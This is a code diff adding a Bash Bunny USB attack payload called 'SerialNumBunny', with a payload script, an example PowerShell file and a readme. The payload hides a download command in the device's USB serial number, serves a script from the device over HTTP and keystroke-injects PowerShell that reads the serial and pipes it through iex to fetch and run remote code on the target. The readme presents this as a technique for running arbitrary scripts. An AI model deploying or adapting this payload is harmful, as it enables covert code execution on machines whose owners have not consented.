Created SerialNumBunny

Provide payloads in the bunny serial number and execute them via PowerShell.

payloads/library/execution/SerialNumBunny/1.PS1

@@ -0,0 +1,15 @@
+#This is just an example script, you may want to replace it with a script of your choice
+$Picture=@"
+
+           _____  _____  _____  _____     _____  _____  _____  _____  __ __
+ (\___/)  | __  ||  _  ||   __||  |  |   | __  ||  |  ||   | ||   | ||  |  |
+ (='.'=)  | __ -||     ||__   ||     |   | __ -||  |  || | | || | | ||_   _|
+ (")_(")  |_____||__|__||_____||__|__|   |_____||_____||_|___||_|___|  |_|      
+ Bash Bunny by Hak5     USB Attack/Automation Platform                       
+                                                                             
+"@
+
+Sleep -s 5
+Write-Host -ForegroundColor red "$Picture"
+Sleep -s 2
+Write-Host -ForegroundColor green "SerialNumBunny by 0iphor13"

payloads/library/execution/SerialNumBunny/payload.txt

@@ -0,0 +1,46 @@
+#!/bin/bash
+#
+# Title:         SerialNumBunny
+# Description:   Execute strings placed in the Bunny serial number
+# Author:        0iphor13
+# Version:       1.0
+# Category:      Execution
+# Attackmodes:   HID, RNDIS_ETHERNET
+
+# Starting as Ethernet device only first to get IP
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+# Switch to Ethernet & HID 
+LED Y
+# Defining Device Identifiers - Serialnumber contains payload
+ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so the server is accessible immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+#Opens hidden powershell instance
+Q DELAY 1500
+Q GUI r
+Q DELAY 500
+Q STRING "powershell"
+Q DELAY 500
+Q ENTER
+
+Q DELAY 1000
+# Make sure that device ID matches what was defined above
+Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex"
+Q DELAY 400
+Q ENTER
+LED FINISH 

payloads/library/execution/SerialNumBunny/readme.md

@@ -0,0 +1,18 @@
+**Title: SerialNumBunny**
+
+<p>Author: 0iphor13<br>
+OS: Windows<br>
+Version: 1.0<br>
+
+**What is SerialNumBunny?**
+
+*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.*
+
+You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts.
+
+**Instruction:**
+
+- Upload your script or the example provided onto your Bunnys switch folder.
+- Plug in the Bunny and let the magic happen.
+
+_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._